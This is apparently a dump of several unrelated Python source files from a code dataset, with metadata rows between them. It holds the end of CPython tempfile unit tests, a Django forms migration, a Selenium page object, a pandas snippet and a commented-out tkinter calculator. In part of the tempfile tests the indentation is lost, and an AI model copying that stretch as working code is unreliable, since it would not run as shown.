            self.assertTrue(f._rolled)
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_context_manager_after_rollover(self):
        # A SpooledTemporaryFile can be used as a context manager
        f = tempfile.SpooledTemporaryFile(max_size=1)
        f.write(b'abc\n')
        f.flush()
        self.assertTrue(f._rolled)
        with f:
            self.assertFalse(f.closed)
        self.assertTrue(f.closed)
        def use_closed():
            with f:
                pass
        self.assertRaises(ValueError, use_closed)

    def test_truncate_with_size_parameter(self):
        # A SpooledTemporaryFile can be truncated to zero size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.seek(0)
        f.truncate()
        self.assertFalse(f._rolled)
        self.assertEqual(f._file.getvalue(), b'')
        # A SpooledTemporaryFile can be truncated to a specific size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.truncate(4)
        self.assertFalse(f._rolled)
        self.assertEqual(f._file.getvalue(), b'abcd')
        # A SpooledTemporaryFile rolls over if truncated to large size
        f = tempfile.SpooledTemporaryFile(max_size=10)
        f.write(b'abcdefg\n')
        f.truncate(20)
        self.assertTrue(f._rolled)
        if has_stat:
            self.assertEqual(os.fstat(f.fileno()).st_size, 20)
# On POSIX, TemporaryFile is a distinct function; on platforms where it is
# just an alias for NamedTemporaryFile there is nothing extra to test.
if tempfile.NamedTemporaryFile is not tempfile.TemporaryFile:

    class TestTemporaryFile(BaseTestCase):
        """Test TemporaryFile()."""

        def test_basic(self):
            # TemporaryFile can create files
            # No point in testing the name params - the file has no name.
            tempfile.TemporaryFile()

        def test_has_no_name(self):
            # TemporaryFile creates files with no names (on this system)
            dir = tempfile.mkdtemp()
            f = tempfile.TemporaryFile(dir=dir)
            f.write(b'blat')

            # Sneaky: because this file has no name, it should not prevent
            # us from removing the directory it was created in.
            try:
                os.rmdir(dir)
            except:
                # cleanup
                f.close()
                os.rmdir(dir)
                raise

        def test_multiple_close(self):
            # A TemporaryFile can be closed many times without error
            f = tempfile.TemporaryFile()
            f.write(b'abc\n')
            f.close()
            f.close()
            f.close()

        # How to test the mode and bufsize parameters?
        def test_mode_and_encoding(self):
            # Round-trip data through each supported mode/encoding/newline
            # combination and verify it reads back unchanged.
            def roundtrip(input, *args, **kwargs):
                with tempfile.TemporaryFile(*args, **kwargs) as fileobj:
                    fileobj.write(input)
                    fileobj.seek(0)
                    self.assertEqual(input, fileobj.read())

            roundtrip(b"1234", "w+b")
            roundtrip("abdc\n", "w+")
            roundtrip("\u039B", "w+", encoding="utf-16")
            roundtrip("foo\r\n", "w+", newline="")
# Helper for test_del_on_shutdown
class NulledModules:
def __init__(self, *modules):
self.refs = [mod.__dict__ for mod in modules]
self.contents = [ref.copy() for ref in self.refs]
def __enter__(self):
for d in self.refs:
for key in d:
d[key] = None
def __exit__(self, *exc_info):
for d, c in zip(self.refs, self.contents):
d.clear()
d.update(c)
class TestTemporaryDirectory(BaseTestCase):
"""Test TemporaryDirectory()."""
def do_create(self, dir=None, pre="", suf="", recurse=1):
if dir is None:
dir = tempfile.gettempdir()
tmp = tempfile.TemporaryDirectory(dir=dir, prefix=pre, suffix=suf)
self.nameCheck(tmp.name, dir, pre, suf)
# Create a subdirectory and some files
if recurse:
d1 = self.do_create(tmp.name, pre, suf, recurse-1)
d1.name = None
with open(os.path.join(tmp.name, "test.txt"), "wb") as f:
f.write(b"Hello world!")
return tmp
def test_mkdtemp_failure(self):
# Check no additional exception if mkdtemp fails
# Previously would raise AttributeError instead
# (noted as part of Issue #10188)
with tempfile.TemporaryDirectory() as nonexistent:
pass
with self.assertRaises(FileNotFoundError) as cm:
tempfile.TemporaryDirectory(dir=nonexistent)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def test_explicit_cleanup(self):
# A TemporaryDirectory is deleted when cleaned up
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
self.assertTrue(os.path.exists(d.name),
"TemporaryDirectory %s does not exist" % d.name)
d.cleanup()
self.assertFalse(os.path.exists(d.name),
"TemporaryDirectory %s exists after cleanup" % d.name)
finally:
os.rmdir(dir)
@support.skip_unless_symlink
def test_cleanup_with_symlink_to_a_directory(self):
# cleanup() should not follow symlinks to directories (issue #12464)
d1 = self.do_create()
d2 = self.do_create(recurse=0)
# Symlink d1/foo -> d2
os.symlink(d2.name, os.path.join(d1.name, "foo"))
# This call to cleanup() should not follow the "foo" symlink
d1.cleanup()
self.assertFalse(os.path.exists(d1.name),
"TemporaryDirectory %s exists after cleanup" % d1.name)
self.assertTrue(os.path.exists(d2.name),
"Directory pointed to by a symlink was deleted")
self.assertEqual(os.listdir(d2.name), ['test.txt'],
"Contents of the directory pointed to by a symlink "
"were deleted")
d2.cleanup()
@support.cpython_only
def test_del_on_collection(self):
# A TemporaryDirectory is deleted when garbage collected
dir = tempfile.mkdtemp()
try:
d = self.do_create(dir=dir)
name = d.name
del d # Rely on refcounting to invoke __del__
self.assertFalse(os.path.exists(name),
"TemporaryDirectory %s exists after __del__" % name)
finally:
os.rmdir(dir)
def test_del_on_shutdown(self):
    # A TemporaryDirectory may be cleaned up during shutdown
    #
    # For each module that might keep the object alive until interpreter
    # shutdown, run a subprocess that parks a TemporaryDirectory on that
    # module, then verify the directory was removed and that a
    # ResourceWarning (but no traceback) was reported on stderr.
    with self.do_create() as dir:
        for mod in ('builtins', 'os', 'shutil', 'sys', 'tempfile', 'warnings'):
            # The "if True:" wrapper lets the embedded code be indented
            # freely without breaking compilation under exec.
            code = """if True:
                import builtins
                import os
                import shutil
                import sys
                import tempfile
                import warnings
                tmp = tempfile.TemporaryDirectory(dir={dir!r})
                sys.stdout.buffer.write(tmp.name.encode())
                tmp2 = os.path.join(tmp.name, 'test_dir')
                os.mkdir(tmp2)
                with open(os.path.join(tmp2, "test.txt"), "w") as f:
                    f.write("Hello world!")
                {mod}.tmp = tmp
                warnings.filterwarnings("always", category=ResourceWarning)
                """.format(dir=dir, mod=mod)
            # The child prints the tmp dir path on stdout before shutdown.
            rc, out, err = script_helper.assert_python_ok("-c", code)
            tmp_name = out.decode().strip()
            self.assertFalse(os.path.exists(tmp_name),
                        "TemporaryDirectory %s exists after cleanup" % tmp_name)
            err = err.decode('utf-8', 'backslashreplace')
            # No exception may leak from the implicit cleanup, but the
            # ResourceWarning must have been emitted.
            self.assertNotIn("Exception ", err)
            self.assertIn("ResourceWarning: Implicitly cleaning up", err)
def test_warnings_on_cleanup(self):
    """__del__ must emit a ResourceWarning and still remove the tree."""
    with self.do_create() as parent:
        tmpdir = self.do_create(dir=parent, recurse=3)
        path = tmpdir.name

        # Check for the resource warning
        with support.check_warnings(('Implicitly', ResourceWarning), quiet=False):
            warnings.filterwarnings("always", category=ResourceWarning)
            del tmpdir
            support.gc_collect()
        self.assertFalse(os.path.exists(path),
                         "TemporaryDirectory %s exists after __del__" % path)
def test_multiple_close(self):
    """Repeated cleanup() calls must be harmless no-ops."""
    tmpdir = self.do_create()
    for _ in range(3):
        tmpdir.cleanup()
def test_context_manager(self):
    """The with-statement yields the path and removes it on exit."""
    tmpdir = self.do_create()
    with tmpdir as path:
        self.assertTrue(os.path.exists(path))
        self.assertEqual(path, tmpdir.name)
    self.assertFalse(os.path.exists(path))
def test_main():
    # regrtest-style entry point: run every TestCase defined in this module.
    support.run_unittest(__name__)
if __name__ == "__main__":
    # Allow executing the test file directly (outside of regrtest).
    test_main()
| [
"tpsatish95@gmail.com"
] | tpsatish95@gmail.com |
b44c80c1722c93ac0ba0dae957fc214ed4cbfa59 | cca62aba8bc6b8ad498a0f40485529eefc10c713 | /shoptutorial/lib/python3.6/site-packages/aldryn_forms/migrations/0001_initial.py | bf9f2ffe2c39dfd8d3121cfb18fbe3d6359e5cc0 | [] | no_license | hamzafaisaljarral/scoop | 22af9f1362ed78f395ac558b7043ae2270e93217 | 72809299eea0e71a38e035fd15533c4dc13cdd37 | refs/heads/master | 2023-01-11T23:50:20.483475 | 2019-08-02T13:43:37 | 2019-08-02T13:43:37 | 158,827,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,713 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import filer.fields.folder
from django.conf import settings
import cms.models.fields
import sizefield.models
class Migration(migrations.Migration):
dependencies = [
('filer', '0002_auto_20150606_2003'),
('cms', '0003_auto_20140926_2347'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='EmailFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('email_send_notification', models.BooleanField(default=False, help_text='When checked, the value of this field will be used to send an email notification.', verbose_name='send notification when form is submitted')),
('email_subject', models.CharField(default='', help_text='Used as the email subject when email_send_notification is checked.', max_length=200, verbose_name='email subject', blank=True)),
('email_body', models.TextField(default='', help_text='Additional body text used when email notifications are active.', verbose_name='Additional email body', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FieldsetPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('legend', models.CharField(max_length=50, verbose_name='Legend', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FileUploadFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('max_size', sizefield.models.FileSizeField(help_text='The maximum file size of the upload, in bytes. You can use common size suffixes (kB, MB, GB, ...).', null=True, verbose_name='Maximum file size', blank=True)),
('upload_to', filer.fields.folder.FilerFolderField(verbose_name='Upload files to', to='filer.Folder', help_text='Select a folder to which all files submitted through this field will be uploaded to.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FormButtonPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label')),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='FormData',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=50, editable=False, db_index=True)),
('data', models.TextField(null=True, editable=False, blank=True)),
('language', models.CharField(default='en', max_length=10, verbose_name='language', choices=[('de', 'German'), ('en', 'English'), ('fr', 'French')])),
('people_notified', models.TextField(help_text='People who got a notification when form was submitted.', verbose_name='users notified', editable=False, blank=True)),
('sent_at', models.DateTimeField(auto_now_add=True)),
],
options={
'verbose_name': 'Form submission',
'verbose_name_plural': 'Form submissions',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='FormPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('name', models.CharField(help_text='Used to filter out form submissions.', max_length=50, verbose_name='Name')),
('error_message', models.TextField(help_text="An error message that will be displayed if the form doesn't validate.", null=True, verbose_name='Error message', blank=True)),
('success_message', models.TextField(help_text='An success message that will be displayed.', null=True, verbose_name='Success message', blank=True)),
('redirect_type', models.CharField(help_text='Where to redirect the user when the form has been successfully sent?', max_length=20, verbose_name='Redirect to', choices=[('redirect_to_page', 'CMS Page'), ('redirect_to_url', 'Absolute URL')])),
('url', models.URLField(null=True, verbose_name='Absolute URL', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('form_template', models.CharField(default='aldryn_forms/form.html', max_length=200, verbose_name='form template', choices=[('aldryn_forms/form.html', 'Default')])),
('page', cms.models.fields.PageField(verbose_name='CMS Page', blank=True, to='cms.Page', null=True)),
('recipients', models.ManyToManyField(help_text='People who will get the form content via e-mail.', to=settings.AUTH_USER_MODEL, verbose_name='Recipients', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='ImageUploadFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('max_size', sizefield.models.FileSizeField(help_text='The maximum file size of the upload, in bytes. You can use common size suffixes (kB, MB, GB, ...).', null=True, verbose_name='Maximum file size', blank=True)),
('max_width', models.PositiveIntegerField(help_text='The maximum width of the uploaded image, in pixels.', null=True, verbose_name='Maximum image width', blank=True)),
('max_height', models.PositiveIntegerField(help_text='The maximum height of the uploaded image, in pixels.', null=True, verbose_name='Maximum image height', blank=True)),
('upload_to', filer.fields.folder.FilerFolderField(verbose_name='Upload files to', to='filer.Folder', help_text='Select a folder to which all files submitted through this field will be uploaded to.')),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.CharField(max_length=50, verbose_name='Value')),
('default_value', models.BooleanField(default=False, verbose_name='Default')),
('field', models.ForeignKey(editable=False, to='aldryn_forms.FieldPlugin')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextAreaFieldPlugin',
fields=[
('cmsplugin_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='cms.CMSPlugin')),
('label', models.CharField(max_length=50, verbose_name='Label', blank=True)),
('required', models.BooleanField(default=True, verbose_name='Field is required')),
('required_message', models.TextField(help_text='Error message displayed if the required field is left empty. Default: "This field is required".', null=True, verbose_name='Error message', blank=True)),
('placeholder_text', models.CharField(help_text='Default text in a form. Disappears when user starts typing. Example: "email@exmaple.com"', max_length=50, verbose_name='Placeholder text', blank=True)),
('help_text', models.TextField(help_text='Explanatory text displayed next to input field. Just like this one.', null=True, verbose_name='Help text', blank=True)),
('min_value', models.PositiveIntegerField(null=True, verbose_name='Min value', blank=True)),
('max_value', models.PositiveIntegerField(null=True, verbose_name='Max value', blank=True)),
('custom_classes', models.CharField(max_length=200, verbose_name='custom css classes', blank=True)),
('text_area_columns', models.PositiveIntegerField(null=True, verbose_name='columns', blank=True)),
('text_area_rows', models.PositiveIntegerField(null=True, verbose_name='rows', blank=True)),
],
options={
'abstract': False,
},
bases=('cms.cmsplugin',),
),
]
| [
"hamzafaisaljarral@gmail.com"
] | hamzafaisaljarral@gmail.com |
12f18400f128855b6ff8b05703994fd4e52cd2a6 | 62fe88bdfc12262dac265478f97cac6abd041ea3 | /Pages/AddEmployeePage.py | dad24f5fca9a3d88cf07a473e1d9fccbc114f85f | [] | no_license | sdjukic980/humanity | 090fc3ce82194649da93e29bdf3e735490aa5d2c | bbcc10eab16a76fb2a65fd6224eafccc14c7eb99 | refs/heads/master | 2020-12-03T00:18:56.030709 | 2017-07-04T19:12:54 | 2017-07-04T19:12:54 | 96,013,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | from Framework.basepageclass import BasePageClass
from Locators.AddEmployeePageLocators import AddEmployeePageLocator
class AddEmployeePage(BasePageClass):
    """Page object for the "Add Employee" form.

    Each public method wraps one user interaction; all selectors live in
    AddEmployeePageLocator so tests never touch raw locators.  Inherits
    ``wait_for_element`` / ``wait_for_text`` and ``self.driver`` from
    BasePageClass.
    """

    def _type_into(self, locator, text):
        # Shared helper: wait for the field to appear, then type into it.
        # (Replaces three copy-pasted method bodies.)
        self.wait_for_element(*locator)
        field = self.driver.find_element(*locator)
        field.send_keys(text)

    def add_employee_name(self, name):
        """Type *name* into the first-name field."""
        self._type_into(AddEmployeePageLocator.FIELDADDNAME1, name)

    def add_employee_lastname(self, lastname):
        """Type *lastname* into the last-name field."""
        self._type_into(AddEmployeePageLocator.FIELDADDLASTNAME1, lastname)

    def add_employee_email(self, email):
        """Type *email* into the e-mail field."""
        self._type_into(AddEmployeePageLocator.FIELDADDEMAIL1, email)

    def add_employe_as(self, name, lastname, email):
        """Fill the whole form in one call.

        NOTE: the misspelled name ("employe") is kept for backwards
        compatibility with existing callers.
        """
        self.add_employee_name(name)
        self.add_employee_lastname(lastname)
        self.add_employee_email(email)

    def save_employees(self):
        """Click the save button."""
        btn_save = self.driver.find_element(*AddEmployeePageLocator.BTNSAVEEMPLOYEE)
        btn_save.click()

    def label_message(self):
        """Wait for the status label (LABEL locator) and return its text."""
        self.wait_for_text(*AddEmployeePageLocator.LABEL)
        label = self.driver.find_element(*AddEmployeePageLocator.LABEL)
        return label.text
| [
"sdjukic980@gmail.com"
] | sdjukic980@gmail.com |
43a04e5ac41572106ab3ff879af6d0b36c7e0e92 | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Data Science and Mechine Leraning/99.py | a816c6cc8a35dc07365ddd5a9e3c00881cf640da | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | import numpy as np
import pandas as pd

# Demo: replace every NaN in a small DataFrame with a placeholder string.
# (np is imported at the top of the file.)
li = dict(A=[1, 2, np.nan], B=[1, np.nan, np.nan], C=[1, 2, 3])
li2 = pd.DataFrame(li)
li3 = li2.fillna('FILL VALUE')
print(li3)
"touhiduzzamantuhin95@gmail.com"
] | touhiduzzamantuhin95@gmail.com |
dbca292cb3bff6282f1d9cf3497023769aa3cd45 | e913d49911ad8b2c583e1bccaece8307091022b5 | /tk_test.py | c6d62747ae2cc08341d1b04cc4f4edefca6fa7d8 | [] | no_license | akaProgramer/python_tkinter | 6531c1c0fe3523a4df0b5c3fc2b65e77a90b5ae4 | 57d166b8d4e05051959b311e9b0e0b03715fbe5e | refs/heads/master | 2022-12-13T21:11:25.930960 | 2020-09-08T17:53:47 | 2020-09-08T17:53:47 | 282,791,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,887 | py | # from tkinter import *
# import math
# import parser
# import tkinter.messagebox
# root = Tk()
# root.title("Scientific Calculator")
# root.configure(background = 'green')
# root.resizable(width=False, height=False)
# root.geometry("480x568+0+0")
# calc = Frame(root)
# calc.grid()
# #**************************************************************#
# class Calc():
# def __init__(self):
# self.total=0
# self.current=''
# self.input_value=True
# self.check_sum=False
# self.op=''
# self.result=False
# def numberEnter(self, num):
# self.result=False
# firstnum=txtDisplay.get()
# secondnum=str(num)
# if self.input_value:
# self.current = secondnum
# self.input_value=False
# else:
# if secondnum == '.':
# if secondnum in firstnum:
# return
# self.current = firstnum+secondnum
# self.display(self.current)
# def sum_of_total(self):
# self.result=True
# self.current=float(self.current)
# if self.check_sum==True:
# self.valid_function()
# else:
# self.total=float(txtDisplay.get())
# def display(self, value):
# txtDisplay.delete(0, END)
# txtDisplay.insert(0, value)
# def valid_function(self):
# if self.op == "add":
# self.total += self.current
# if self.op == "sub":
# self.total -= self.current
# if self.op == "multi":
# self.total *= self.current
# if self.op == "divide":
# self.total /= self.current
# if self.op == "mod":
# self.total %= self.current
# self.input_value=True
# self.check_sum=False
# self.display(self.total)
# def operation(self, op):
# self.current = float(self.current)
# if self.check_sum:
# self.valid_function()
# elif not self.result:
# self.total=self.current
# self.input_value=True
# self.check_sum=True
# self.op=op
# self.result=False
# def Clear_Entry(self):
# self.result = False
# self.current = "0"
# self.display(0)
# self.input_value=True
# def All_Clear_Entry(self):
# self.Clear_Entry()
# self.total=0
# def pi(self):
# self.result = False
# self.current = math.pi
# self.display(self.current)
# def tau(self):
# self.result = False
# self.current = math.tau
# self.display(self.current)
# def e(self):
# self.result = False
# self.current = math.e
# self.display(self.current)
# def mathPM(self):
# self.result = False
# self.current = -(float(txtDisplay.get()))
# self.display(self.current)
# def squared(self):
# self.result = False
# self.current = math.sqrt(float(txtDisplay.get()))
# self.display(self.current)
# def cos(self):
# self.result = False
# self.current = math.cos(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def cosh(self):
# self.result = False
# self.current = math.cosh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def tan(self):
# self.result = False
# self.current = math.tan(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def tanh(self):
# self.result = False
# self.current = math.tanh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def sin(self):
# self.result = False
# self.current = math.sin(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def sinh(self):
# self.result = False
# self.current = math.sinh(math.radians(float(txtDisplay.get())))
# self.display(self.current)
# def log(self):
# self.result = False
# self.current = math.log(float(txtDisplay.get()))
# self.display(self.current)
# def exp(self):
# self.result = False
# self.current = math.exp(float(txtDisplay.get()))
# self.display(self.current)
# def acosh(self):
# self.result = False
# self.current = math.acosh(float(txtDisplay.get()))
# self.display(self.current)
# def asinh(self):
# self.result = False
# self.current = math.asinh(float(txtDisplay.get()))
# self.display(self.current)
# def expm1(self):
# self.result = False
# self.current = math.expm1(float(txtDisplay.get()))
# self.display(self.current)
# def lgamma(self):
# self.result = False
# self.current = math.lgamma(float(txtDisplay.get()))
# self.display(self.current)
# def degrees(self):
# self.result = False
# self.current = math.degrees(float(txtDisplay.get()))
# self.display(self.current)
# def log2(self):
# self.result = False
# self.current = math.log2(float(txtDisplay.get()))
# self.display(self.current)
# def log10(self):
# self.result = False
# self.current = math.log10(float(txtDisplay.get()))
# self.display(self.current)
# def log1p(self):
# self.result = False
# self.current = math.log1p(float(txtDisplay.get()))
# self.display(self.current)
# added_value = Calc()
# #**************************************************************#
# txtDisplay = Entry(calc, font=('Helvetica',20,'bold'),bg='yellow', bd=30, width=28,
# justify=RIGHT)
# txtDisplay.grid(row=0,column=0, columnspan=4, pady=1)
# txtDisplay.insert(0,"0")
# numberpad = "789456123"
# i=0
# btn = []
# for j in range(2,5):
# for k in range(3):
# btn.append(Button(calc, width=6, height=2, bg="blue", font=('Helvetica',20,'bold'),bd=4,
# text=numberpad[i]))
# btn[i].grid(row=j, column= k, pady = 1)
# btn[i]["command"]=lambda x=numberpad[i]:added_value.numberEnter(x)
# i+=1
# #**************************************************************#
# btnClear = Button(calc, text=chr(67),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4, command=added_value.Clear_Entry).grid(row=1, column= 0, pady = 1)
# btnAllClear = Button(calc, text=chr(67)+chr(69),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.All_Clear_Entry).grid(row=1, column= 1, pady = 1)
# btnsq = Button(calc, text="\u221A",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.squared).grid(row=1, column= 2, pady = 1)
# btnAdd = Button(calc, text="+",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("add")
# ).grid(row=1, column= 3, pady = 1)
# btnSub = Button(calc, text="-",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("sub")
# ).grid(row=2, column= 3, pady = 1)
# btnMul = Button(calc, text="x",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("multi")
# ).grid(row=3, column= 3, pady = 1)
# btnDiv = Button(calc, text="/",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("divide")
# ).grid(row=4, column= 3, pady = 1)
# btnZero = Button(calc, text="0",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.numberEnter(0)
# ).grid(row=5, column= 0, pady = 1)
# btnDot = Button(calc, text=".",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.numberEnter(".")
# ).grid(row=5, column= 1, pady = 1)
# btnPM = Button(calc, text=chr(177),width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.mathPM).grid(row=5, column= 2, pady = 1)
# btnEquals = Button(calc, text="=",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sum_of_total).grid(row=5, column= 3, pady = 1)
# #**************************************************************#
# btnPi = Button(calc, text="π",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.pi).grid(row=1, column= 4, pady = 1)
# btnCos = Button(calc, text="Cos",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.cos).grid(row=1, column= 5, pady = 1)
# btntan = Button(calc, text="tan",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tan).grid(row=1, column= 6, pady = 1)
# btnsin = Button(calc, text="sin",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sin).grid(row=1, column= 7, pady = 1)
# #**************************************************************#
# btn2Pi = Button(calc, text="2π",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tau).grid(row=2, column= 4, pady = 1)
# btnCosh = Button(calc, text="Cosh",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.cosh).grid(row=2, column= 5, pady = 1)
# btntanh = Button(calc, text="tanh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.tanh).grid(row=2, column= 6, pady = 1)
# btnsinh = Button(calc, text="sinh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.sinh).grid(row=2, column= 7, pady = 1)
# #**************************************************************#
# btnlog = Button(calc, text="log",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log).grid(row=3, column= 4, pady = 1)
# btnExp = Button(calc, text="exp",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.exp).grid(row=3, column= 5, pady = 1)
# btnMod = Button(calc, text="Mod",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=lambda:added_value.operation("mod")
# ).grid(row=3, column= 6, pady = 1)
# btnE = Button(calc, text="e",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.e).grid(row=3, column= 7, pady = 1)
# #**************************************************************#
# btnlog10 = Button(calc, text="log10",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
